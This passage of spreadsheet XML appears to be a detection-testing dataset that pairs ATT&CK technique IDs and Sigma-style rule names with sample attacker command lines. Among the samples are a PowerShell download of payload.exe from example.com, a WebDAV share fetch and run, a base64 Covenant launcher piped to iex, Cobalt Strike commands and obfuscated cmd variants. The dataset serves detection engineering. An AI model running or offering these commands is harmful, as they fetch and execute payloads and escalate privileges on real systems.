          <t>powershell.exe -Command "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F3707" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3707" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3707" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3707" s="43" t="n"/>
      <c r="J3707" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3707" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3708" ht="15.75" customHeight="1" s="42">
      <c r="A3708" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3708" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_path_traversal</t>
        </is>
      </c>
      <c r="C3708" s="43" t="inlineStr">
        <is>
          <t>Potential CommandLine Path Traversal Via Cmd.EXE</t>
        </is>
      </c>
      <c r="D3708" s="43" t="inlineStr">
        <is>
          <t>087790e3-3287-436c-bccf-cbd0184a7db1</t>
        </is>
      </c>
      <c r="E3708" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "./.././../Windows/System32/calc.exe"</t>
        </is>
      </c>
      <c r="F3708" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3708" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3708" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3708" s="43" t="n"/>
      <c r="J3708" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3708" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3709" ht="15.75" customHeight="1" s="42">
      <c r="A3709" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3709" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_stdin_redirect</t>
        </is>
      </c>
      <c r="C3709" s="43" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE</t>
        </is>
      </c>
      <c r="D3709" s="43" t="inlineStr">
        <is>
          <t>241e802a-b65e-484f-88cd-c2dc10f9206d</t>
        </is>
      </c>
      <c r="E3709" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c cmd /r cmd&lt;"C:\AtomicRedTeam\atomics\T1059.003\src\t1059.003_cmd.cmd"</t>
        </is>
      </c>
      <c r="F3709" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3709" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3709" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3709" s="43" t="n"/>
      <c r="J3709" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3709" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3710" ht="15.75" customHeight="1" s="42">
      <c r="A3710" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3710" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_path_traversal</t>
        </is>
      </c>
      <c r="C3710" s="43" t="inlineStr">
        <is>
          <t>Conhost.exe CommandLine Path Traversal</t>
        </is>
      </c>
      <c r="D3710" s="43" t="inlineStr">
        <is>
          <t>ee5e119b-1f75-4b34-add8-3be976961e39</t>
        </is>
      </c>
      <c r="E3710" s="43" t="inlineStr">
        <is>
          <t>conhost.exe conhost.exe "..\..\..\..\windows\system32\calc.exe"</t>
        </is>
      </c>
      <c r="F3710" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3710" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3710" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3710" s="43" t="n"/>
      <c r="J3710" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3710" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3711" ht="15.75" customHeight="1" s="42">
      <c r="A3711" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3711" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_path_traversal</t>
        </is>
      </c>
      <c r="C3711" s="43" t="inlineStr">
        <is>
          <t>Conhost.exe CommandLine Path Traversal</t>
        </is>
      </c>
      <c r="D3711" s="43" t="inlineStr">
        <is>
          <t>ee5e119b-1f75-4b34-add8-3be976961e39</t>
        </is>
      </c>
      <c r="E3711" s="43" t="inlineStr">
        <is>
          <t>conhost.exe conhost.exe ..\..\..\..\windows\system32\calc.exe</t>
        </is>
      </c>
      <c r="F3711" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3711" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3711" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3711" s="43" t="n"/>
      <c r="J3711" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3711" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3712" ht="15.75" customHeight="1" s="42">
      <c r="A3712" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3712" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_path_traversal</t>
        </is>
      </c>
      <c r="C3712" s="43" t="inlineStr">
        <is>
          <t>Conhost.exe CommandLine Path Traversal</t>
        </is>
      </c>
      <c r="D3712" s="43" t="inlineStr">
        <is>
          <t>ee5e119b-1f75-4b34-add8-3be976961e39</t>
        </is>
      </c>
      <c r="E3712" s="43" t="inlineStr">
        <is>
          <t>conhost.exe "conhost.exe" "..\..\..\..\windows\system32\calc.exe"</t>
        </is>
      </c>
      <c r="F3712" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3712" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3712" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3712" s="43" t="n"/>
      <c r="J3712" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3712" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3713" ht="15.75" customHeight="1" s="42">
      <c r="A3713" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3713" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_cmd</t>
        </is>
      </c>
      <c r="C3713" s="43" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands</t>
        </is>
      </c>
      <c r="D3713" s="43" t="inlineStr">
        <is>
          <t>647c7b9e-d784-4fda-b9a0-45c565a7b729</t>
        </is>
      </c>
      <c r="E3713" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "psinject"</t>
        </is>
      </c>
      <c r="F3713" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3713" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3713" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3713" s="43" t="n"/>
      <c r="J3713" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3713" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3714" ht="15.75" customHeight="1" s="42">
      <c r="A3714" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3714" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_cmd</t>
        </is>
      </c>
      <c r="C3714" s="43" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands</t>
        </is>
      </c>
      <c r="D3714" s="43" t="inlineStr">
        <is>
          <t>647c7b9e-d784-4fda-b9a0-45c565a7b729</t>
        </is>
      </c>
      <c r="E3714" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c spawnas</t>
        </is>
      </c>
      <c r="F3714" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3714" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3714" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3714" s="43" t="n"/>
      <c r="J3714" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3714" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3715" ht="15.75" customHeight="1" s="42">
      <c r="A3715" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3715" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_cmd</t>
        </is>
      </c>
      <c r="C3715" s="43" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands</t>
        </is>
      </c>
      <c r="D3715" s="43" t="inlineStr">
        <is>
          <t>647c7b9e-d784-4fda-b9a0-45c565a7b729</t>
        </is>
      </c>
      <c r="E3715" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c make_token</t>
        </is>
      </c>
      <c r="F3715" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3715" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3715" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3715" s="43" t="n"/>
      <c r="J3715" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3715" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3716" ht="15.75" customHeight="1" s="42">
      <c r="A3716" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3716" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_cmd</t>
        </is>
      </c>
      <c r="C3716" s="43" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands</t>
        </is>
      </c>
      <c r="D3716" s="43" t="inlineStr">
        <is>
          <t>647c7b9e-d784-4fda-b9a0-45c565a7b729</t>
        </is>
      </c>
      <c r="E3716" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "rev2self"</t>
        </is>
      </c>
      <c r="F3716" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3716" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3716" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3716" s="43" t="n"/>
      <c r="J3716" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3716" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3717" ht="15.75" customHeight="1" s="42">
      <c r="A3717" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3717" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_cmd</t>
        </is>
      </c>
      <c r="C3717" s="43" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands</t>
        </is>
      </c>
      <c r="D3717" s="43" t="inlineStr">
        <is>
          <t>647c7b9e-d784-4fda-b9a0-45c565a7b729</t>
        </is>
      </c>
      <c r="E3717" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c getsystem</t>
        </is>
      </c>
      <c r="F3717" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3717" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3717" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3717" s="43" t="n"/>
      <c r="J3717" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3717" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3718" ht="15.75" customHeight="1" s="42">
      <c r="A3718" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3718" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_cmd</t>
        </is>
      </c>
      <c r="C3718" s="43" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands</t>
        </is>
      </c>
      <c r="D3718" s="43" t="inlineStr">
        <is>
          <t>647c7b9e-d784-4fda-b9a0-45c565a7b729</t>
        </is>
      </c>
      <c r="E3718" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "ps^inject"</t>
        </is>
      </c>
      <c r="F3718" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3718" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3718" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3718" s="43" t="n"/>
      <c r="J3718" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3718" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3719" ht="15.75" customHeight="1" s="42">
      <c r="A3719" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3719" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_cmd</t>
        </is>
      </c>
      <c r="C3719" s="43" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Commands</t>
        </is>
      </c>
      <c r="D3719" s="43" t="inlineStr">
        <is>
          <t>647c7b9e-d784-4fda-b9a0-45c565a7b729</t>
        </is>
      </c>
      <c r="E3719" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "m^ake_token"</t>
        </is>
      </c>
      <c r="F3719" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3719" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3719" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3719" s="43" t="n"/>
      <c r="J3719" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3719" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3720" ht="15.75" customHeight="1" s="42">
      <c r="A3720" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3720" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_modules</t>
        </is>
      </c>
      <c r="C3720" s="43" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Modules</t>
        </is>
      </c>
      <c r="D3720" s="43" t="inlineStr">
        <is>
          <t>4f154fb6-27d1-4813-a759-78b93e0b9c48</t>
        </is>
      </c>
      <c r="E3720" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "invoke-userhunter"</t>
        </is>
      </c>
      <c r="F3720" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3720" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3720" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3720" s="43" t="n"/>
      <c r="J3720" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3720" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3721" ht="15.75" customHeight="1" s="42">
      <c r="A3721" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3721" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_jlaive_batch_execution</t>
        </is>
      </c>
      <c r="C3721" s="43" t="inlineStr">
        <is>
          <t>HackTool - Jlaive In-Memory Assembly Execution</t>
        </is>
      </c>
      <c r="D3721" s="43" t="inlineStr">
        <is>
          <t>0a99eb3e-1617-41bd-b095-13dc767f3def</t>
        </is>
      </c>
      <c r="E3721" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c script.bat &amp;&amp; xcopy powershell.exe script.bat.exe*</t>
        </is>
      </c>
      <c r="F3721" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3721" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3721" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3721" s="43" t="n"/>
      <c r="J3721" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3721" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3722" ht="15.75" customHeight="1" s="42">
      <c r="A3722" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3722" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_jlaive_batch_execution</t>
        </is>
      </c>
      <c r="C3722" s="43" t="inlineStr">
        <is>
          <t>HackTool - Jlaive In-Memory Assembly Execution</t>
        </is>
      </c>
      <c r="D3722" s="43" t="inlineStr">
        <is>
          <t>0a99eb3e-1617-41bd-b095-13dc767f3def</t>
        </is>
      </c>
      <c r="E3722" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c script.bat &amp;&amp; copy powershell.exe script.bat.exe</t>
        </is>
      </c>
      <c r="F3722" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3722" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3722" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3722" s="43" t="n"/>
      <c r="J3722" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3722" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3723" ht="15.75" customHeight="1" s="42">
      <c r="A3723" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3723" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C3723" s="43" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D3723" s="43" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E3723" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /q /c chcp 1252</t>
        </is>
      </c>
      <c r="F3723" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3723" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3723" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3723" s="43" t="n"/>
      <c r="J3723" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3723" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3724" ht="15.75" customHeight="1" s="42">
      <c r="A3724" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3724" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C3724" s="43" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D3724" s="43" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E3724" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /q /c "chcp" 1252</t>
        </is>
      </c>
      <c r="F3724" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3724" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3724" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3724" s="43" t="n"/>
      <c r="J3724" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3724" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3725" ht="15.75" customHeight="1" s="42">
      <c r="A3725" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B3725" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C3725" s="43" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D3725" s="43" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E3725" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /q /c chcp^ 1252</t>
        </is>
      </c>
      <c r="F3725" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3725" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3725" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3725" s="43" t="n"/>
      <c r="J3725" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3725" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3726" ht="15.75" customHeight="1" s="42">
      <c r="A3726" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3726" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_net_use_and_exec_combo</t>
        </is>
      </c>
      <c r="C3726" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Execution From Internet Hosted WebDav Share</t>
        </is>
      </c>
      <c r="D3726" s="43" t="inlineStr">
        <is>
          <t>f0507c0f-a3a2-40f5-acc6-7f543c334993</t>
        </is>
      </c>
      <c r="E3726" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c " net use https://192.0.2.1/share &amp; start payload.exe "</t>
        </is>
      </c>
      <c r="F3726" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3726" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3726" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3726" s="43" t="n"/>
      <c r="J3726" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3726" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3727" ht="15.75" customHeight="1" s="42">
      <c r="A3727" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3727" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_no_space_execution</t>
        </is>
      </c>
      <c r="C3727" s="43" t="inlineStr">
        <is>
          <t>Cmd.EXE Missing Space Characters Execution Anomaly</t>
        </is>
      </c>
      <c r="D3727" s="43" t="inlineStr">
        <is>
          <t>a16980c2-0c56-4de0-9a79-17971979efdd</t>
        </is>
      </c>
      <c r="E3727" s="43" t="inlineStr">
        <is>
          <t>cmd.exe/cwhoami</t>
        </is>
      </c>
      <c r="F3727" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3727" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3727" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3727" s="43" t="n"/>
      <c r="J3727" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3727" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3728" ht="15.75" customHeight="1" s="42">
      <c r="A3728" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3728" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_no_space_execution</t>
        </is>
      </c>
      <c r="C3728" s="43" t="inlineStr">
        <is>
          <t>Cmd.EXE Missing Space Characters Execution Anomaly</t>
        </is>
      </c>
      <c r="D3728" s="43" t="inlineStr">
        <is>
          <t>a16980c2-0c56-4de0-9a79-17971979efdd</t>
        </is>
      </c>
      <c r="E3728" s="43" t="inlineStr">
        <is>
          <t>cmd.exe/c whoami</t>
        </is>
      </c>
      <c r="F3728" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3728" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3728" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3728" s="43" t="n"/>
      <c r="J3728" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3728" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3729" ht="15.75" customHeight="1" s="42">
      <c r="A3729" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3729" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_no_space_execution</t>
        </is>
      </c>
      <c r="C3729" s="43" t="inlineStr">
        <is>
          <t>Cmd.EXE Missing Space Characters Execution Anomaly</t>
        </is>
      </c>
      <c r="D3729" s="43" t="inlineStr">
        <is>
          <t>a16980c2-0c56-4de0-9a79-17971979efdd</t>
        </is>
      </c>
      <c r="E3729" s="43" t="inlineStr">
        <is>
          <t>cmd.exe/c^whoami</t>
        </is>
      </c>
      <c r="F3729" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3729" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3729" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3729" s="43" t="n"/>
      <c r="J3729" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3729" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3730" ht="15.75" customHeight="1" s="42">
      <c r="A3730" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3730" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3730" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3730" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3730" s="43" t="inlineStr">
        <is>
          <t>conhost.exe --headless "powershell.exe -Command Write-Host 'Bypassed'"</t>
        </is>
      </c>
      <c r="F3730" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3730" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3730" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3730" s="43" t="n"/>
      <c r="J3730" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3730" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3731" ht="15.75" customHeight="1" s="42">
      <c r="A3731" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3731" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3731" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3731" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3731" s="43" t="inlineStr">
        <is>
          <t>conhost.exe --headless powershell.exe -Command "Write-Host 'Bypassed'"</t>
        </is>
      </c>
      <c r="F3731" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3731" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3731" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3731" s="43" t="n"/>
      <c r="J3731" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3731" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3732" ht="15.75" customHeight="1" s="42">
      <c r="A3732" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3732" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3732" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3732" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3732" s="43" t="inlineStr">
        <is>
          <t>conhost.exe --headless powershell -ExecutionPolicy Bypass -Command "Write-Host 'Bypassed'"</t>
        </is>
      </c>
      <c r="F3732" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3732" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3732" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3732" s="43" t="n"/>
      <c r="J3732" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3732" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3733" ht="15.75" customHeight="1" s="42">
      <c r="A3733" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3733" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3733" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3733" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3733" s="43" t="inlineStr">
        <is>
          <t>conhost.exe --headless powershell.exe -Command Write-Host 'Bypassed'</t>
        </is>
      </c>
      <c r="F3733" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3733" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3733" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3733" s="43" t="n"/>
      <c r="J3733" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3733" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3734" ht="15.75" customHeight="1" s="42">
      <c r="A3734" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3734" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C3734" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D3734" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E3734" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('cwB2ACAAbwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACkAOwBzAHYAIABkACAA')) | iex"</t>
        </is>
      </c>
      <c r="F3734" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3734" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3734" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3734" s="43" t="n"/>
      <c r="J3734" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3734" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3735" ht="15.75" customHeight="1" s="42">
      <c r="A3735" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3735" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C3735" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D3735" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
